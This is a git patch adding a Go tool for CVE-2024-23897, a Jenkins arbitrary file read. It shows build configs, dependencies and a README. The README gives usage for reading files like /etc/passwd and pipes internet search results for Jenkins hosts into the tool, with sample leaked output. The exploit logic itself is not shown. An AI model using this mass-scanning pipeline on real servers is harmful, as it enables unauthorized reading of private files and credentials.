From 2c6847fe162436f46ff8123612c9774ded6fd911 Mon Sep 17 00:00:00 2001
From: wjlin0 <wjlgeren@163.com>
Date: Sun, 28 Jan 2024 03:24:25 +0800
Subject: [PATCH] =?UTF-8?q?=F0=9F=8E=89=20CVE-2024-23897?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .github/workflows/release-binary.yml |  69 ++++++
 .github/workflows/release-test.yml   |  71 ++++++
 .gitignore                           |   6 +
 .goreleaser/linux.yml                |  25 +++
 .goreleaser/mac.yml                  |  24 +++
 .goreleaser/windows.yml              |  24 +++
 LICENSE                              |  21 ++
 README.md                            | 105 +++++++++
 cmd/CVE-2024-23897/CVE-2024-23897.go |  18 ++
 go.mod                               |  78 +++++++
 go.sum                               | 309 +++++++++++++++++++++++++++
 pkg/input/input.go                   |  38 ++++
 pkg/runner/banner.go                 |  24 +++
 pkg/runner/options.go                |  62 ++++++
 pkg/runner/output.go                 |  44 ++++
 pkg/runner/proxy.go                  |  49 +++++
 pkg/runner/runner.go                 | 130 +++++++++++
 pkg/runner/validate.go               |  43 ++++
 pkg/scanner/check.go                 |  10 +
 pkg/scanner/exploit.go               | 128 +++++++++++
 pkg/scanner/scanner.go               |  76 +++++++
 pkg/types/options.go                 |  21 ++
 pkg/types/proxy.go                   |   6 +
 pkg/utils/utils.go                   |  59 +++++
 24 files changed, 1440 insertions(+)
 create mode 100644 .github/workflows/release-binary.yml
 create mode 100644 .github/workflows/release-test.yml
 create mode 100644 .gitignore
 create mode 100644 .goreleaser/linux.yml
 create mode 100644 .goreleaser/mac.yml
 create mode 100644 .goreleaser/windows.yml
 create mode 100644 LICENSE
 create mode 100644 README.md
 create mode 100644 cmd/CVE-2024-23897/CVE-2024-23897.go
 create mode 100644 go.mod
 create mode 100644 go.sum
 create mode 100644 pkg/input/input.go
 create mode 100644 pkg/runner/banner.go
 create mode 100644 pkg/runner/options.go
 create mode 100644 pkg/runner/output.go
 create mode 100644 pkg/runner/proxy.go
 create mode 100644 pkg/runner/runner.go
 create mode 100644 pkg/runner/validate.go
 create mode 100644 pkg/scanner/check.go
 create mode 100644 pkg/scanner/exploit.go
 create mode 100644 pkg/scanner/scanner.go
 create mode 100644 pkg/types/options.go
 create mode 100644 pkg/types/proxy.go
 create mode 100644 pkg/utils/utils.go

diff --git a/.github/workflows/release-binary.yml b/.github/workflows/release-binary.yml
new file mode 100644
index 0000000..bcb87f9
--- /dev/null
+++ b/.github/workflows/release-binary.yml
@@ -0,0 +1,69 @@
+name: 🎉 Release Binary
+
+on:
+  push:
+    tags:
+      - v*
+  workflow_dispatch:
+
+jobs:
+  build-mac:
+    runs-on: macos-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/mac.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+  build-linux:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/linux.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
+
+  build-windows:
+    runs-on: windows-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/windows.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
\ No newline at end of file
diff --git a/.github/workflows/release-test.yml b/.github/workflows/release-test.yml
new file mode 100644
index 0000000..2a7d0fe
--- /dev/null
+++ b/.github/workflows/release-test.yml
@@ -0,0 +1,71 @@
+name: 🔨 Release Test
+
+on:
+  pull_request:
+    paths:
+      - '**.go'
+      - '**.mod'
+      - '**.yml'
+  workflow_dispatch:
+
+jobs:
+  release-test-mac:
+    runs-on: macos-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/mac.yml"
+          version: latest
+          workdir: .
+
+  release-test-linux:
+    runs-on: ubuntu-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/linux.yml"
+          version: latest
+          workdir: .
+
+  release-test-windows:
+    runs-on: windows-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/windows.yml"
+          version: latest
+          workdir: .
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..6c39028
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,6 @@
+*.json
+*.DS_Store
+.idea/
+test/
+output/
+
diff --git a/.goreleaser/linux.yml b/.goreleaser/linux.yml
new file mode 100644
index 0000000..cf90ea6
--- /dev/null
+++ b/.goreleaser/linux.yml
@@ -0,0 +1,25 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-linux
+    binary: '{{ .ProjectName }}'
+    env:
+      - CGO_ENABLED=0
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - linux
+    goarch:
+      - amd64
+      - arm64
+      - arm
+
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+checksum:
+  name_template: "{{ .ProjectName }}-linux-checksums.txt"
\ No newline at end of file
diff --git a/.goreleaser/mac.yml b/.goreleaser/mac.yml
new file mode 100644
index 0000000..1e8df73
--- /dev/null
+++ b/.goreleaser/mac.yml
@@ -0,0 +1,24 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-darwin
+    binary: '{{ .ProjectName }}'
+    env:
+      - CGO_ENABLED=0
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - darwin
+    goarch:
+      - amd64
+      - arm64
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+
+checksum:
+  name_template: "{{ .ProjectName }}-mac-checksums.txt"
\ No newline at end of file
diff --git a/.goreleaser/windows.yml b/.goreleaser/windows.yml
new file mode 100644
index 0000000..208f8bf
--- /dev/null
+++ b/.goreleaser/windows.yml
@@ -0,0 +1,24 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-windows
+    env:
+      - CGO_ENABLED=0
+    binary: '{{ .ProjectName }}'
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - windows
+    goarch:
+      - "amd64"
+      - "386"
+      - "arm"
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+checksum:
+  name_template: "{{ .ProjectName }}-windows-checksums.txt"
\ No newline at end of file
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..e2e36d9
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 wjlin0
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..76ca439
--- /dev/null
+++ b/README.md
@@ -0,0 +1,105 @@
+<h4 align="center"> CVE-2024-23897 - Jenkins 任意文件读取 利用工具 </h4>
+<p align="center">
+<img src="https://img.shields.io/github/go-mod/go-version/wjlin0/CVE-2024-23897?filename=go.mod" alt="">
+<a href="https://github.com/wjlin0/CVE-2024-23897/releases/"><img src="https://img.shields.io/github/release/wjlin0/CVE-2024-23897" alt=""></a> 
+<a href="https://github.com/wjlin0/CVE-2024-23897" ><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/wjlin0/CVE-2024-23897"></a>
+<a href="https://github.com/wjlin0/CVE-2024-23897/releases"><img src="https://img.shields.io/github/downloads/wjlin0/CVE-2024-23897/total" alt=""></a> 
+<a href="https://github.com/wjlin0/CVE-2024-23897"><img src="https://img.shields.io/github/last-commit/wjlin0/CVE-2024-23897" alt=""></a> 
+<a href="https://wjlin0.com/"><img src="https://img.shields.io/badge/wjlin0-blog-green" alt=""></a>
+</p>
+
+# 安装
+
+CVE-2024-23897 需要`go 1.21`才能完成安装 执行以下命令
+
+```shell
+go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
+```
+或者
+安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
+- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_arm64.zip)
+
+- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_amd64.zip)
+
+- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_linux_amd64.zip)
+
+- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_amd64.zip)
+
+- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_386.zip)
+
+
+# 使用
+```shell
+CVE-2024-23897 -help
+```
+```text
+CVE-2024-23897 is a tool for scanning for CVE-2024-23897
+
+Usage:
+  CVE-2024-23897 [flags]
+
+Flags:
+INPUT:
+   -url, -u string[]       URL to scan. (e.g. -u https://example.com)
+   -list string[]          File containing list of URLs to scan. (e.g. -list list.txt)
+   -f, -filename string[]  The file path that needs to be read. (e.g. -f /etc/passwd)
+
+OUTPUT:
+   -no-color  Don't Use colors in output
+
+DEBUG:
+   -debug                           Enable debugging
+   -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
+   -irt, -input-read-timeout value  timeout on input read (default 3m0s)
+   -no-stdin                        disable stdin processing
+
+LIMIT:
+   -timeout int          time to wait in seconds before timeout (default 10)
+   -t, -thread int       Number of concurrent threads (default 10)
+   -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)
+
+
+Examples:
+Run CVE-2024-23897 on a single targets
+        $ CVE-2024-23897 -url https://example.com
+Run CVE-2024-23897 on a list of targets
+        $ CVE-2024-23897 -list list.txt
+Run CVE-2024-23897 on a single targets with filenames
+        $ CVE-2024-23897 -url https://example.com -f /etc/passwd -f /etc/hostname
+Run CVE-2024-23897 on a single targets a proxy server
+        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890
+Run CVE-2024-23897 on uncovering Jenkins
+        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+```
+
+use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
+
+```shell
+pathScan -ue quake -uq 'app:"springboot"' -uc -silent -ul 200 | CVE-2024-23897
+```
+> To protect your privacy, I have deleted some outputs
+```text
+➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+
+   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
+  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
+ / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / /
+/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /
+\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/
+
+
+Jenkins 任意文件读取漏洞
+						wjlin0.com
+
+慎用。你要为自己的行为负责
+开发者不承担任何责任，也不对任何误用或损坏负责.
+
+[INF] Loaded 50 targets from input
+[INF] Read /etc/passwd file first line
+[CVE-2024-23897] https://example.com /etc/hostname - cc0c73d0f754
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[CVE-2024-23897] https://example.com /etc/hostname - debian
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[INF] took 92.75 seconds with 13 successful requests
+```
diff --git a/cmd/CVE-2024-23897/CVE-2024-23897.go b/cmd/CVE-2024-23897/CVE-2024-23897.go
new file mode 100644
index 0000000..10b2359
--- /dev/null
+++ b/cmd/CVE-2024-23897/CVE-2024-23897.go
@@ -0,0 +1,18 @@
+package main
+
+import (
+	"github.com/projectdiscovery/gologger"
+	"github.com/wjlin0/CVE-2024-23897/pkg/runner"
+)
+
+func main() {
+
+	newRunner, err := runner.NewRunner(runner.ParseOptions())
+	if err != nil {
+		gologger.Fatal().Msgf("new runner error: %s", err.Error())
+		return
+	}
+	if err := newRunner.RunEnumeration(); err != nil {
+		gologger.Fatal().Msgf("run enumeration error: %s", err.Error())
+	}
+}
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..631dce1
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,78 @@
+module github.com/wjlin0/CVE-2024-23897
+
+go 1.21.5
+
+require (
+	github.com/fatih/color v1.15.0
+	github.com/google/uuid v1.6.0
+	github.com/projectdiscovery/goflags v0.1.36
+	github.com/projectdiscovery/gologger v1.1.12
+	github.com/projectdiscovery/ratelimit v0.0.25
+	github.com/projectdiscovery/retryablehttp-go v1.0.42
+	github.com/projectdiscovery/utils v0.0.73
+	github.com/remeh/sizedwaitgroup v1.0.0
+)
+
+require (
+	github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809 // indirect
+	github.com/akrylysov/pogreb v0.10.1 // indirect
+	github.com/andybalholm/brotli v1.0.6 // indirect
+	github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect
+	github.com/aymerick/douceur v0.2.0 // indirect
+	github.com/cloudflare/circl v1.3.7 // indirect
+	github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08 // indirect
+	github.com/dimchansky/utfbom v1.1.1 // indirect
+	github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect
+	github.com/gaukas/godicttls v0.0.4 // indirect
+	github.com/golang/snappy v0.0.4 // indirect
+	github.com/gorilla/css v1.0.0 // indirect
+	github.com/json-iterator/go v1.1.12 // indirect
+	github.com/klauspost/compress v1.16.7 // indirect
+	github.com/klauspost/pgzip v1.2.5 // indirect
+	github.com/logrusorgru/aurora v2.0.3+incompatible // indirect
+	github.com/mattn/go-colorable v0.1.13 // indirect
+	github.com/mattn/go-isatty v0.0.19 // indirect
+	github.com/mholt/archiver/v3 v3.5.1 // indirect
+	github.com/microcosm-cc/bluemonday v1.0.25 // indirect
+	github.com/miekg/dns v1.1.56 // indirect
+	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
+	github.com/modern-go/reflect2 v1.0.2 // indirect
+	github.com/nwaples/rardecode v1.1.3 // indirect
+	github.com/pierrec/lz4/v4 v4.1.2 // indirect
+	github.com/pkg/errors v0.9.1 // indirect
+	github.com/projectdiscovery/blackrock v0.0.1 // indirect
+	github.com/projectdiscovery/fastdialer v0.0.50 // indirect
+	github.com/projectdiscovery/hmap v0.0.33 // indirect
+	github.com/projectdiscovery/networkpolicy v0.0.6 // indirect
+	github.com/projectdiscovery/retryabledns v1.0.48 // indirect
+	github.com/quic-go/quic-go v0.37.7 // indirect
+	github.com/refraction-networking/utls v1.5.4 // indirect
+	github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d // indirect
+	github.com/syndtr/goleveldb v1.0.0 // indirect
+	github.com/tidwall/btree v1.4.3 // indirect
+	github.com/tidwall/buntdb v1.3.0 // indirect
+	github.com/tidwall/gjson v1.14.3 // indirect
+	github.com/tidwall/grect v0.1.4 // indirect
+	github.com/tidwall/match v1.1.1 // indirect
+	github.com/tidwall/pretty v1.2.0 // indirect
+	github.com/tidwall/rtred v0.1.2 // indirect
+	github.com/tidwall/tinyqueue v0.1.1 // indirect
+	github.com/ulikunitz/xz v0.5.11 // indirect
+	github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 // indirect
+	github.com/weppos/publicsuffix-go v0.30.1-0.20230422193905-8fecedd899db // indirect
+	github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect
+	github.com/yl2chen/cidranger v1.0.2 // indirect
+	github.com/zmap/rc2 v0.0.0-20190804163417-abaa70531248 // indirect
+	github.com/zmap/zcrypto v0.0.0-20230422215203-9a665e1e9968 // indirect
+	go.etcd.io/bbolt v1.3.7 // indirect
+	go.uber.org/multierr v1.11.0 // indirect
+	golang.org/x/crypto v0.17.0 // indirect
+	golang.org/x/exp v0.0.0-20221205204356-47842c84f3db // indirect
+	golang.org/x/mod v0.12.0 // indirect
+	golang.org/x/net v0.17.0 // indirect
+	golang.org/x/sys v0.16.0 // indirect
+	golang.org/x/text v0.14.0 // indirect
+	golang.org/x/tools v0.13.0 // indirect
+	gopkg.in/djherbis/times.v1 v1.3.0 // indirect
+	gopkg.in/yaml.v3 v3.0.1 // indirect
+)
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..f8db937
--- /dev/null
+++ b/go.sum
@@ -0,0 +1,309 @@
+cloud.google.com/go/compute/metadata v0.2.0/go.mod h1:zFmK7XCadkQkj6TtorcaGlCW1hT1fIilQDwofLpJ20k=
+github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809 h1:ZbFL+BDfBqegi+/Ssh7im5+aQfBRx6it+kHnC7jaDU8=
+github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809/go.mod h1:upgc3Zs45jBDnBT4tVRgRcgm26ABpaP7MoTSdgysca4=
+github.com/akrylysov/pogreb v0.10.1 h1:FqlR8VR7uCbJdfUob916tPM+idpKgeESDXOA1K0DK4w=
+github.com/akrylysov/pogreb v0.10.1/go.mod h1:pNs6QmpQ1UlTJKDezuRWmaqkgUE2TuU0YTWyqJZ7+lI=
+github.com/andybalholm/brotli v1.0.1/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y=
+github.com/andybalholm/brotli v1.0.6 h1:Yf9fFpf49Zrxb9NlQaluyE92/+X7UVHlhMNJN2sxfOI=
+github.com/andybalholm/brotli v1.0.6/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig=
+github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 h1:DklsrG3dyBCFEj5IhUbnKptjxatkF07cF2ak3yi77so=
+github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw=
+github.com/aymerick/douceur v0.2.0 h1:Mv+mAeH1Q+n9Fr+oyamOlAkUNPWPlA8PPGR0QAaYuPk=
+github.com/aymerick/douceur v0.2.0/go.mod h1:wlT5vV2O3h55X9m7iVYN0TBM0NH/MmbLnd30/FjWUq4=
+github.com/bits-and-blooms/bitset v1.8.0 h1:FD+XqgOZDUxxZ8hzoBFuV9+cGWY9CslN6d5MS5JVb4c=
+github.com/bits-and-blooms/bitset v1.8.0/go.mod h1:7hO7Gc7Pp1vODcmWvKMRA9BNmbv6a/7QIWpPxHddWR8=
+github.com/bits-and-blooms/bloom/v3 v3.5.0 h1:AKDvi1V3xJCmSR6QhcBfHbCN4Vf8FfxeWkMNQfmAGhY=
+github.com/bits-and-blooms/bloom/v3 v3.5.0/go.mod h1:Y8vrn7nk1tPIlmLtW2ZPV+W7StdVMor6bC1xgpjMZFs=
+github.com/cloudflare/circl v1.3.7 h1:qlCDlTPz2n9fu58M0Nh1J/JzcFpfgkFHHX3O35r5vcU=
+github.com/cloudflare/circl v1.3.7/go.mod h1:sRTcRWXGLrKw6yIGJ+l7amYJFfAXbZG0kBSc8r4zxgA=
+github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08 h1:ox2F0PSMlrAAiAdknSRMDrAr8mfxPCfSZolH+/qQnyQ=
+github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08/go.mod h1:pCxVEbcm3AMg7ejXyorUXi6HQCzOIBf7zEDVPtw0/U4=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
+github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi/U=
+github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE=
+github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 h1:iFaUwBSo5Svw6L7HYpRu/0lE3e0BaElwnNO1qkNQxBY=
+github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj60/X5sZFNxpG4HBPDHVqxNm4DfnCKgrbZOT+s=
+github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY=
+github.com/fatih/color v1.15.0 h1:kOqh6YHBtK8aywxGerMG2Eq3H6Qgoqeo13Bk2Mv/nBs=
+github.com/fatih/color v1.15.0/go.mod h1:0h5ZqXfHYED7Bhv2ZJamyIOUej9KtShiJESRwBDUSsw=
+github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
+github.com/fsnotify/fsnotify v1.6.0 h1:n+5WquG0fcWoWp6xPWfHdbskMCQaFnG6PfBrh1Ky4HY=
+github.com/fsnotify/fsnotify v1.6.0/go.mod h1:sl3t1tCWJFWoRz9R8WJCbQihKKwmorjAbSClcnxKAGw=
+github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk=
+github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI=
+github.com/go-logr/logr v1.2.4 h1:g01GSCwiDw2xSZfjJ2/T9M+S6pFdcNtFYsp+Y43HYDQ=
+github.com/go-logr/logr v1.2.4/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
+github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI=
+github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls=
+github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
+github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
+github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
+github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
+github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
+github.com/golang/snappy v0.0.0-20180518054509-2e65f85255db/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
+github.com/golang/snappy v0.0.2/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
+github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM=
+github.com/golang/snappy v0.0.4/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
+github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
+github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
+github.com/google/go-cmp v0.5.8/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
+github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38=
+github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
+github.com/google/go-github/v50 v50.1.0/go.mod h1:Ev4Tre8QoKiolvbpOSG3FIi4Mlon3S2Nt9W5JYqKiwA=
+github.com/google/go-querystring v1.1.0/go.mod h1:Kcdr2DB4koayq7X8pmAG4sNG59So17icRSOU623lUBU=
+github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
+github.com/google/pprof v0.0.0-20210407192527-94a9f03dee38 h1:yAJXTCF9TqKcTiHJAE8dj7HMvPfh66eeA2JYW7eFpSE=
+github.com/google/pprof v0.0.0-20210407192527-94a9f03dee38/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
+github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
+github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
+github.com/gorilla/css v1.0.0 h1:BQqNyPTi50JCFMTw/b67hByjMVXZRwGha6wxVGkeihY=
+github.com/gorilla/css v1.0.0/go.mod h1:Dn721qIggHpt4+EFCcTLTU/vk5ySda2ReITrtgBl60c=
+github.com/hashicorp/golang-lru/v2 v2.0.6 h1:3xi/Cafd1NaoEnS/yDssIiuVeDVywU0QdFGl3aQaQHM=
+github.com/hashicorp/golang-lru/v2 v2.0.6/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM=
+github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
+github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
+github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
+github.com/julienschmidt/httprouter v1.3.0 h1:U0609e9tgbseu3rBINet9P48AI/D3oJs4dN7jwJOQ1U=
+github.com/julienschmidt/httprouter v1.3.0/go.mod h1:JR6WtHb+2LUe8TCKY3cZOxFyyO8IZAc4RVcycCCAKdM=
+github.com/klauspost/compress v1.4.1/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A=
